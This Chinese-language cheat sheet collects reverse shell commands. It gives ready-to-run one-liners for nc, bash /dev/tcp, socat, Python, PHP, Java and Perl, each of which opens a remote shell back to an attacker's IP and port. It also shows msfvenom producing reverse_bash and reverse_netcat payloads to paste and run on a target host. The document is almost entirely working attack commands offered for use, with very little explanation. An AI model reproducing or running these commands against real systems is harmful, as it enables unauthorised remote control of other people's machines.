反彈shell命令總結
1.nc反彈
開啟本地8080端口監聽,并將本地的bash發布出去。
root# nc -lvvp 8080 -t -e /bin/bash
連接目標主機
nc ip 端口
2.bash直接反彈
kali監聽
靶機運行:
root# bash -i >& /dev/tcp/ip/端口 0>&1
bash命令解析:
反彈成功
3. socat反彈
kali監聽:socat tcp-listen:1234 -
靶機運行:
socat exec:‘bash -li’,pty,stderr,setsid,sigint,sane tcp:IP:1234
反彈成功
4.腳本反彈
4.1:python反彈
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("IP",Port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
4.2:php反彈
php -r '$sock=fsockopen("IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
4.3:java反彈
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP/port;cat <&5 |
while read line; do $line 2>&5 >&5; done"] as String[]) p.waitFor()
4.4:perl反彈
perl -e 'use Socket;$i="IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
.msf獲取反彈一句話
可以直接使用 msfvenom -l 結合關鍵字過濾(如cmd/unix/reverse),找出需要的各類反彈一句話payload的路徑信息。
# msfvenom -l payloads 'cmd/unix/reverse'
發現msf支持反彈shell類型豐富。可以根據需求選擇。
例如:生成bash的
# root@kali:~# msfvenom -p cmd/unix/reverse_bash lhost=1.1.1.1 lport=6666 R
將生成的payload粘貼,在靶機運行即可。
生成netcat
msfvenom -p cmd/unix/reverse_netcat lhost=1.1.1.1 lport=12345 R
將生成的payload粘貼,在靶機運行即可。
靶機運行payload:
成功反彈
| 
